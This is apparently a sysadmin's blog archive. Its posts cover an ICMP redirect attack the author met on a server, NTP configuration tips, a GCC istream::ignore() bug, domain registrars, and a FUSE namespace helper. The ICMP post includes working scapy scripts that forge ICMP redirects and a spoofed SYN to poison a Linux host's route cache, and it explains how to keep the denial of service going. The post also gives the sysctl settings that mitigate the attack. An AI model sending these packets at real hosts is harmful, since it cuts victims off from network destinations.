July 1, 2013
ICMP Redirect Attacks in the Wild
I recently lost an afternoon dealing with a most vexing routing problem on a server which turned out to be the result of an ICMP redirect attack.
ICMP redirects are a "feature" of IP which allows a router to inform a host that there's a more efficient route to a destination and that the host should adjust its routing table accordingly. This might be OK on a trusted LAN, but on the wild Internet, where malice abounds, it may not be such a good idea to alter your routing table at someone else's whim. Nevertheless, accepting ICMP redirects is enabled by default on Linux.
The problem manifested itself with a customer unable to contact one of our servers. The customer provided a traceroute which starred out after the last hop before our server, leading him to conclude that our firewall was blocking him. We would probably have concluded the same thing, except we knew that no such firewall existed. From our end, traceroutes to him starred out immediately before even reaching our default gateway. Even more bizarrely, if we picked a certain one of our server's four IP addresses as the source address for the traceroute, the traceroute worked! Furthermore, we were able to traceroute to adjacent IP addresses on the customer's subnet from any source address without issue.
We looked again and again at our routing table and our iptables rules. There was nothing to explain this behavior. This server is virtualized, so we were starting to suspect the underlying host, when I decided to look at the kernel's route cache with the ip route show cache command. What I saw worried me greatly:
root@tommy:~# ip route show cache | grep 198.168.103.11
198.168.103.11 via 10.254.87.146 dev eth0 src 66.228.52.206
198.168.103.11 from 66.228.52.251 via 10.254.87.146 dev eth0
198.168.103.11 from 66.228.52.209 via 10.254.87.146 dev eth0
198.168.103.11 from 66.228.52.206 via 66.228.52.1 dev eth0
198.168.103.11 from 66.228.52.250 via 10.254.87.146 dev eth0
These entries say to route packets to 198.168.103.11 (the customer's IP address, changed to protect their identity) via 10.254.87.146. However, 10.254.87.146 is not our default gateway. In fact, we don't use any private IP addresses that look remotely like that. The fourth entry, which has a legitimate gateway and applies only to packets with a source address of 66.228.52.206, explains why we could successfully use that one IP address as a source address.
I had read about ICMP redirect attacks before and suspected that one might be at play here. To test this hypothesis, I spun up a test server and used an extremely useful tool called scapy to send my own fake ICMP redirect packets. The results were strange. Sending the fake ICMP redirect did not immediately put a bogus entry in the route cache. However, if I attempted to contact the host targeted by the redirect within 10 minutes of sending the redirect, then an entry appeared in the route cache that prevented me from contacting the host. Furthermore, once the entry got into the cache, there was no getting rid of it. Even if I flushed the cache, the rogue entry came back the next time I tried to contact the targeted host. The kernel was clearly keeping separate state about redirected routes, and as far as I could tell, there was no way to inspect it. This meant that the only way to recover the affected server was to reboot it!
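The forged packet itself is simple to construct; something along these lines is the general idea (the addresses here are just placeholders, not the ones from the incident, and whether the kernel honors the redirect also depends on sysctls like secure_redirects and shared_media):
#!/usr/bin/env python
# Forge an ICMP "redirect for host" (type 5, code 1) telling the victim to
# route packets for `target` via `rogue`. Addresses are placeholders.
# Requires root to send raw packets.
from scapy.all import IP, ICMP, UDP, send

victim = "192.0.2.10"     # host whose route cache we want to poison
target = "198.51.100.20"  # destination the victim should lose
rogue  = "10.0.0.99"      # bogus next hop to inject

redirect = (
    IP(dst=victim)                  # no spoofed source needed, as noted below
    / ICMP(type=5, code=1, gw=rogue)
    / IP(src=victim, dst=target)    # quoted header of a datagram the victim "sent"
    / UDP(sport=53000, dport=33434)
)

send(redirect)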
There are clear denial-of-service possibilities. If you want to prevent a host (the "victim") from contacting another host (the "target"), just send a fake redirect packet for the target to the victim! Since you don't need to forge a packet's source address to send a rogue ICMP redirect, it will make its way past RP filters. The only constraint is that your victim needs to contact the target within 10 minutes of receiving the redirect for it to stick. This is easy to overcome: you can send the redirect when the victim is likely to be contacting the target, or simply send a new redirect every 10 minutes (that's hardly high volume). Or, more diabolically, if you have the ability to spoof source addresses, you can follow the redirect packet with a TCP SYN packet with its source address spoofed as the target. The victim will reply to the target with a SYN-ACK, and in doing so make permanent the effect of the ICMP redirect.
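The spoofed SYN variant looks something like this (again, placeholder addresses; this one does require the ability to spoof the target's address):
# Spoofed SYN that appears to come from the target; the victim's SYN-ACK reply
# counts as "contacting the target" and cements the poisoned route cache entry.
from scapy.all import IP, TCP, send

victim = "192.0.2.10"
target = "198.51.100.20"

send(IP(src=target, dst=victim) / TCP(sport=12345, dport=22, flags="S"))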
Obviously you need to disable ICMP redirect packets on any public-facing host. Unfortunately, the most intuitive and widely-documented way of disabling ICMP redirects on Linux (by writing 0 to /proc/sys/net/ipv4/conf/all/accept_redirects) doesn't always work! From Documentation/networking/ip-sysctl.txt of the Linux source:
accept_redirects - BOOLEAN
	Accept ICMP redirect messages.
	accept_redirects for the interface will be enabled if:
	- both conf/{all,interface}/accept_redirects are TRUE in the case
	  forwarding for the interface is enabled
	or
	- at least one of conf/{all,interface}/accept_redirects is TRUE in
	  the case forwarding for the interface is disabled
	accept_redirects for the interface will be disabled otherwise
	default TRUE (host)
		FALSE (router)
This arcane logic means that for a non-router (i.e. most servers), not only must /proc/sys/net/ipv4/conf/all/accept_redirects be 0, but so must /proc/sys/net/ipv4/conf/interface/accept_redirects. So, to recap, the following will reliably disable ICMP redirects (assuming your interface is eth0):
echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 0 > /proc/sys/net/ipv4/conf/eth0/accept_redirects
If you put that in a system startup script, you should be safe.
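Equivalently, you can make the settings persistent with sysctl; something like this in /etc/sysctl.conf (or a file under /etc/sysctl.d/) should do, with the conf.default entry included so that interfaces created later also start with redirects disabled:
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0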
A final note: the precise behavior for handling ICMP redirects and the route cache may differ between kernel versions. My tests were conducted on 2.6.39.
March 27, 2013
Running a Robust NTP Daemon
Accurate time is essential on a server, and running ntpd is the best way to ensure it. Unfortunately, ntpd, especially on Debian, can be finicky and in the past I've had trouble with clock drift and ntpd failing to start on boot. Here are my best practices to avoid the problems.
On Debian, make sure lockfile-progs is installed
On Debian (and likely Ubuntu too), there's a nasty race condition on boot between ntpdate and ntpd. When the network comes up, ifupdown runs ntpdate to synchronize the clock. But at about the same time, ntpd starts. If ntpdate is still running when ntpd starts, ntpd can't bind to the local NTP port and terminates. Sometimes ntpd starts on boot and sometimes it doesn't!
The Debian scripts avoid this race using locks, but only if the lockfile-progs package is installed. lockfile-progs is a Recommends: of ntpdate, so if you don't install recommended packages by default, you may miss it.
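So on Debian machines that run both ntpdate and ntpd, it's worth installing it explicitly:
apt-get install lockfile-progs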
If you use DHCP, don't request ntp-servers
If your system gets its IP address from DHCP using dhclient, then by default dhclient will update your ntpd configuration with NTP server information it receives from the DHCP server. It is extremely frustrating to configure reliable upstream NTP servers only to have them replaced with unreliable servers (such as those that advertise phony leap seconds, as has happened to me multiple times). And the last thing you want is your configuration management system fighting with dhclient over what NTP servers to use.
To prevent this, edit /etc/dhcp/dhclient.conf and remove ntp-servers from the request line.
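For reference, a trimmed request line looks something like this (the exact option list varies by distribution and dhclient version; the point is simply that ntp-servers is gone):
request subnet-mask, broadcast-address, time-offset, routers,
        domain-name, domain-name-servers, domain-search, host-name,
        interface-mtu, rfc3442-classless-static-routes;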
Don't use the undisciplined local clock (i.e. server 127.127.1.0)
Make sure these lines aren't in your ntp.conf:
server 127.127.1.0
fudge 127.127.1.0 stratum 10
These lines enable the Undisciplined Local Clock, and cause ntpd to start using your local clock as a time source if the real NTP servers aren't reachable. This can be useful if you want to keep a group of servers on a local network in sync even if your Internet connection goes down, but in general you don't need or want this. I've seen strange situations where the local clock becomes preferred over the real NTP servers, resulting in clock drift that goes uncorrected. Best to disable the local clock by removing all references to 127.127.1.0.
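What you want instead is a handful of real upstream servers; for example, something like this using the public NTP pool (substitute servers you trust):
server 0.pool.ntp.org iburst
server 1.pool.ntp.org iburst
server 2.pool.ntp.org iburst
server 3.pool.ntp.org iburst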
March 2, 2013
GCC's Implementation of basic_istream::ignore() is Broken
The implementation of std::basic_istream::ignore() in GCC's C++ standard library suffers from a serious flaw. After ignoring the n characters as requested, it checks to see if end-of-file has been reached. If it has, then the stream's eofbit is set. The problem is that to check for end-of-file, ignore() has to essentially peek ahead in the stream one character beyond what you've ignored. That means that if you ask to ignore all the characters currently available in the stream buffer, ignore() causes an underflow of the buffer. If it's a file stream, the buffer can be refilled by reading from the filesystem in a finite amount of time, so this is merely inefficient. But if it's a socket, this underflow can be fatal: your program may block forever waiting for bytes that never come. This is horribly unintuitive and is inconsistent with the behavior of std::basic_istream::read(), which does not check for end-of-file after reading the requested number of characters.
The origin of this problem is that the C++ standard is perhaps not as clear as it should be regarding ignore(). From section 27.7.2.3:
basic_istream<charT,traits>& ignore(streamsize n = 1, int_type delim = traits::eof());
Effects: Behaves as an unformatted input function (as described in 27.7.2.3, paragraph 1). After constructing a sentry object, extracts characters and discards them. Characters are extracted until any of the following occurs:
- if n != numeric_limits<streamsize>::max() (18.3.2), n characters are extracted
- end-of-file occurs on the input sequence (in which case the function calls setstate(eofbit), which may throw ios_base::failure (27.5.5.4));
- traits::eq_int_type(traits::to_int_type(c), delim) for the next available input character c (in which case c is extracted).
Note that the Standard does not specify the order in which the checks should be performed, suggesting that a conformant implementation may check for end-of-file before checking if n characters have been extracted, as GCC does. You may think that the order is implicit in the ordering of the bullet points, but if it were, then why would the Standard explicitly state the order in the case of getline()? From section 27.7.2.3:
basic_istream<charT,traits>& getline(char_type* s, streamsize n, char_type delim);
Effects: Behaves as an unformatted input function (as described in 27.7.2.3, paragraph 1). After constructing a sentry object, extracts characters and stores them into successive locations of an array whose first element is designated by s. Characters are extracted and stored until one of the following occurs:
- end-of-file occurs on the input sequence (in which case the function calls setstate(eofbit));
- traits::eq(c, delim) for the next available input character c (in which case the input character is extracted but not stored);
- n is less than one or n - 1 characters are stored (in which case the function calls setstate(failbit)).
These conditions are tested in the order shown.
At least this is one GCC developer's justification for GCC's behavior. However, I have a different take: I believe that the only way to satisfy the Standard's requirements for ignore() is to perform the checks in the order presented. The Standard says that "characters are extracted until any of the following occurs." That means that when n characters have been extracted, ignore() needs to terminate, since this condition is among "any of the following." But, if ignore() first checks for end-of-file and blocks forever, then it doesn't terminate. This constrains the order in which a conformant implementation can check the conditions, and is perhaps why the Standard does not need to specify an explicit order here, but does for getline(), where it really does want the end-of-file check to occur first.
I have left a comment on the GCC bug stating my interpretation. One problem with fixing this bug is that it will break code that has come to depend on eofbit being set if you ignore all the data remaining on a stream, though I'm frankly skeptical that much code would make that assumption. Also, both LLVM's libcxx and Microsoft Visual Studio (version 2005, at least) implement ignore() according to my interpretation of the Standard.
In the meantime, be very, very careful with your use of ignore(). Only use it on file streams or when you know you'll be ignoring fewer characters than are available to be read. And don't rely on eofbit being set one way or the other.
If you need a more reliable version of ignore(), I've written a non-member function implementation which takes a std::basic_istream as its first argument. It is very nearly a drop-in replacement for the member function (it even properly throws exceptions depending on the stream's exceptions mask), except that it returns the number of bytes ignored (not a reference to the stream) in lieu of making the number of bytes available by a call to gcount(). (It's not possible for a non-member function to set the value returned by gcount().)
March 1, 2013
Why Do Hackers Love Namecheap and Hate Name.com?
Update: as of 2022, I no longer use or recommend name.com. My preferred registrars are, in order, Amazon Route 53, Gandi, and Google Domains.
Namecheap has brilliant marketing. The day that GoDaddy announced their support of SOPA, Namecheap pounced on the opportunity. They penned a passionate blog post and declared December 29, 2011 "Move Your Domain Day," complete with a patriotic theme, a coupon code "SOPAsucks," and donations to the EFF. Move Your Domain Day was such a success that it has its own Wikipedia article. Namecheap led the charge against GoDaddy, and I think it's safe to assume that most people who transferred from GoDaddy because of SOPA transferred to Namecheap. Now they seem to be the preferred registrar of the Hacker News/Reddit crowd.
Now consider Name.com. They too opposed SOPA and encouraged transfers using a "nodaddy" coupon code. But they didn't exert nearly as much effort as Namecheap and as a consequence probably lost out on a lot of potential transfers.
But Name.com has a bigger problem. They get raked over the coals on Hacker News because their free DNS hosting service adds a wildcard record that points their users' otherwise non-existent subdomains to their own ad-laden landing page. I think that's bad and they shouldn't do it. But at the same time, people should understand the distinction between domain registration and DNS hosting.
I'm very happy with Name.com as a domain registrar. It is the best I've used (among Network Solutions, GoDaddy, Directnic, Gandi, and 1&1) and the first that I haven't had any significant complaints about. I haven't used Namecheap. Namecheap looks like a good registrar too, but Name.com appears at least as good, if not better. Their UI is friendly and uncluttered. Their about page makes them seem just as non-evil as Namecheap. Name.com has long supported both IPv6 glue records and DNSSEC (Namecheap recently added IPv6 glue but still has no DNSSEC support).
Name.com has two-factor authentication, which is pretty important for such a critical service.
When you buy a domain from Name.com, you're paying for the registration. You don't have to use their DNS service, especially when there are so many good options for DNS hosting: Amazon's Route 53 is very inexpensive, Cloudflare offers DNS as part of their free plan, Hurricane Electric has a free DNS service, Linode has free DNS for their customers, there are paid providers like ZoneEdit, SlickDNS, etc. Or you can host your own DNS.
As a general rule, registrars make crummy DNS providers. Usually the interface is clunky and they don't support all the record types. Only a few months after registering my first domain with Network Solutions, their entire DNS service suffered an hours-long outage during which my domain was unresolvable. Ever since, I've hosted my own DNS without a problem (recently I added Linode as my slave).
I don't have a dog in this race, but I think it would be a shame for someone to exclude a good registrar like Name.com from consideration just because they're a bad DNS provider. It would also be a shame for someone to use any registrar's crummy DNS service when there are so many better options out there.
February 9, 2013
Easily Running FUSE in an Isolated Mount Namespace
I've previously discussed how FUSE's nonstandard semantics can cause problems with rsync-based backups. In short, when stat() is called on a FUSE mount owned by another user, the kernel returns EACCES, even though POSIX says EACCES is for when a file's path can't be traversed. This is done to isolate the effects of an unstable or malicious FUSE filesystem to only the user who mounted it.
In my opinion, instead of stretching POSIX by returning EACCES, a better way to isolate FUSE mounts would be to make them invisible to other users. This has been discussed before, first in 2005 with a patch to add "private mounts" to Linux and later in 2006 with a proposal for stat() to return a fake stat structure for FUSE mounts. However, both times the proposals were rejected in favor of using the more general namespace support along with shared subtrees to achieve isolated FUSE mounts.
Unfortunately, while namespaces and shared subtrees are quite powerful, they have not seen widespread adoption, and userspace support for them is limited to some basic command primitives that don't do much on their own. While there is a PAM namespaces module, it's tailored to giving users isolated /tmp directories.
So, I wrote a very simple C program called with-fuse. with-fuse takes a command as its argument and executes that command with gid fuse and in an isolated mount namespace. Any mounts and unmounts performed inside the private namespace are invisible to the rest of the system. At the same time, mounts and unmounts performed in the global namespace are immediately visible inside the private namespace. with-fuse can be safely installed setuid-root to give users on the system a means of using FUSE without affecting other users.
Example:
$ with-fuse /bin/sh
$ sshfs ...
$ exit
For with-fuse to work, the following command must be run at system boot (for example, from /etc/rc.local):
mount --make-rshared /
Note that with-fuse creates a per-process namespace, not a per-user namespace. That means that the mounts created in one with-fuse namespace will not be visible in another with-fuse namespace, even if both namespaces are owned by the same user. Therefore, the user may wish to run a terminal multiplexer like GNU Screen inside his with-fuse namespace, in order to share the namespace among several shells:
$ with-fuse screen
To ensure that users only use FUSE from within a with-fuse namespace, /dev/fuse should be owned by group fuse and have 660 permissions. No user should be a member of group fuse, as with-fuse will take care of granting that GID.
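For example, as a one-off (on a udev-managed system you'd want a udev rule to make these settings persist across reboots):
chgrp fuse /dev/fuse
chmod 660 /dev/fuse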
You can download the source for with-fuse here. It's short and extensively commented if you'd like to learn how it works.